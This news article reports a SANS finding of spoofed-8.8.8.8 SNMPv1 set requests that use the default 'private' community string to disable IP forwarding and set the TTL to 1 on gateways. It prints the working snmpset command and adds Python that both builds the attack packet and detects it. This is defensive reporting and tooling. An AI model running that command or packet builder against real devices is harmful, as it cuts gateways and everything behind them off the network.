Attackers tapping on SNMP door to see if it's open
SANS spots new, dumb attack
The IP address of Google's public DNS resolver, 8.8.8.8, is being spoofed by an attacker, apparently in an attempt to knock offline SNMP-enabled hosts that still accept a default community string. The weakness being exploited is not a flaw in the SNMP protocol itself but a well-known misconfiguration.
The SANS Internet Storm Center noticed the traffic trend emerging on September 15, and in this post discusses what's going on.
The attack targets SNMP hosts whose administrators have left the default read/write community string “private” in place; in SNMPv1 the community string is the only authentication there is, so anyone who knows it can write to the device. SANS says the traffic either comes from a troll or from someone genuinely tapping on the door of target systems.
The attacker sends an SNMP “set” request (a SetRequest PDU) with that community string, something which on a badly configured system would: “set the default TTL to 1, which would make it impossible for the gateway to connect to other systems that are not on the same link-layer network”, and “turn off IP forwarding”. Either change on its own is enough to take a gateway off the network for everything behind it.
The SANS post says the traffic can be recreated with the net-snmp snmpset command (SNMPv1, community string “private”):
snmpset -v 1 -c private [target ip] .1.3.6.1.2.1.4.2.0 int 1 .1.3.6.1.2.1.4.1.0 int 2
The two OIDs are the standard MIB-II objects ipDefaultTTL (1.3.6.1.2.1.4.2.0), here set to 1, and ipForwarding (1.3.6.1.2.1.4.1.0), where the value 2 means notForwarding.
Anybody seeing UDP traffic that claims to come from 8.8.8.8 and is aimed at port 161 could check whether they've been tapped by the attacker and let SANS know. Genuine replies from Google's resolver come from UDP source port 53 to whichever ephemeral port the client used, never to port 161, so any such packet is spoofed; a quick check is whether the SNMP agent on the device still answers to “public” or “private” at all.
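To make the snmpset command above and the detection advice concrete, here is an added example (not code from SANS or The Register) that builds the SNMPv1 SetRequest the command emits and then parses such a packet to flag the attack. It assumes the standard MIB-II OIDs for ipDefaultTTL and ipForwarding, the well-known default community strings “public” and “private”, a request-id of 1, and a sample packet constructed inline; the function names are this example's own, not net-snmp's.

```python
"""Build and detect the spoofed-8.8.8.8 SNMPv1 SetRequest (added example).

Assumptions (not from the original article): SNMPv1 (version 0), community
strings 'public'/'private' as the defaults, request-id 1, and the MIB-II
OIDs below.  The sample packet is constructed here, not captured.
"""

IP_FORWARDING = "1.3.6.1.2.1.4.1.0"   # MIB-II ipForwarding: 1=forwarding, 2=notForwarding
IP_DEFAULT_TTL = "1.3.6.1.2.1.4.2.0"  # MIB-II ipDefaultTTL
NOT_FORWARDING = 2
DEFAULT_COMMUNITIES = {"public", "private"}  # assumed default strings
SET_REQUEST = 0xA3  # SNMPv1 SetRequest-PDU tag


# ---- minimal BER encoder (enough for integer varbinds) ----
def _len(n):
    if n < 0x80:
        return bytes([n])
    b = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(b)]) + b


def _tlv(tag, body):
    return bytes([tag]) + _len(len(body)) + body


def _int(v):  # minimal two's-complement INTEGER
    return _tlv(0x02, v.to_bytes(max(1, (v.bit_length() + 8) // 8), "big", signed=True))


def _oid(s):
    arcs = [int(a) for a in s.strip(".").split(".")]
    out = bytes([arcs[0] * 40 + arcs[1]])
    for a in arcs[2:]:  # base-128, high bit set on all but the last byte
        enc = bytes([a & 0x7F])
        a >>= 7
        while a:
            enc = bytes([0x80 | (a & 0x7F)]) + enc
            a >>= 7
        out += enc
    return _tlv(0x06, out)


def build_setrequest(community, bindings, request_id=1, pdu_tag=SET_REQUEST):
    """UDP payload of an SNMPv1 SetRequest carrying (oid, int) varbinds."""
    vbl = b"".join(_tlv(0x30, _oid(o) + _int(v)) for o, v in bindings)
    pdu = _tlv(pdu_tag, _int(request_id) + _int(0) + _int(0) + _tlv(0x30, vbl))
    return _tlv(0x30, _int(0) + _tlv(0x04, community.encode()) + pdu)


# ---- minimal BER decoder ----
def _read_tlv(buf, pos):
    tag, l, pos = buf[pos], buf[pos + 1], pos + 2
    if l & 0x80:
        n = l & 0x7F
        l, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + l], pos + l


def _dec_int(b):
    return int.from_bytes(b, "big", signed=True)


def _dec_oid(b):
    arcs, v = [b[0] // 40, b[0] % 40], 0
    for byte in b[1:]:
        v = (v << 7) | (byte & 0x7F)
        if not byte & 0x80:
            arcs.append(v)
            v = 0
    return ".".join(map(str, arcs))


def parse_snmpv1(payload):
    """Return (version, community, pdu_tag, {oid: value}) from a UDP payload."""
    tag, msg, _ = _read_tlv(payload, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message")
    _, ver, p = _read_tlv(msg, 0)
    _, comm, p = _read_tlv(msg, p)
    pdu_tag, pdu, _ = _read_tlv(msg, p)
    q = 0
    for _ in range(3):  # request-id, error-status, error-index
        _, _, q = _read_tlv(pdu, q)
    _, vbl, _ = _read_tlv(pdu, q)
    binds, pos = {}, 0
    while pos < len(vbl):
        _, vb, pos = _read_tlv(vbl, pos)
        _, o, r = _read_tlv(vb, 0)
        vtag, val, _ = _read_tlv(vb, r)
        binds[_dec_oid(o)] = _dec_int(val) if vtag == 0x02 else val
    return _dec_int(ver), comm.decode("latin-1"), pdu_tag, binds


def classify(src_ip, dst_port, payload):
    """Reasons a packet looks like the attack described by SANS; [] if benign."""
    reasons = []
    if src_ip == "8.8.8.8" and dst_port == 161:
        reasons.append("spoofed source: 8.8.8.8 only ever sends DNS replies from udp/53")
    try:
        _, comm, pdu_tag, binds = parse_snmpv1(payload)
    except (IndexError, ValueError):
        return reasons  # malformed or not SNMP; the spoof check still stands
    if pdu_tag == SET_REQUEST and comm in DEFAULT_COMMUNITIES:
        reasons.append(f"SetRequest with default community {comm!r}")
    if binds.get(IP_DEFAULT_TTL) == 1:
        reasons.append("sets ipDefaultTTL to 1")
    if binds.get(IP_FORWARDING) == NOT_FORWARDING:
        reasons.append("sets ipForwarding to notForwarding")
    return reasons


# Constructed sample: what the snmpset command in the article puts on the wire.
ATTACK_PKT = build_setrequest("private", [(IP_DEFAULT_TTL, 1), (IP_FORWARDING, NOT_FORWARDING)])

if __name__ == "__main__":
    print(ATTACK_PKT.hex())
    for r in classify("8.8.8.8", 161, ATTACK_PKT):
        print("-", r)
```

The same decoder can be pointed at payloads pulled from a capture (for example `tcpdump -n 'src host 8.8.8.8 and udp dst port 161'` with `-w`), and the spoof check alone is enough to raise an alert even when the SetRequest is malformed or uses a community string other than the defaults.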
A couple of respondents to the SANS post said the attack seems to be methodical and working to a pretty straightforward pattern: “one hit on a single IP every 20 minutes, working thru our class C in sequence”, one stated. ®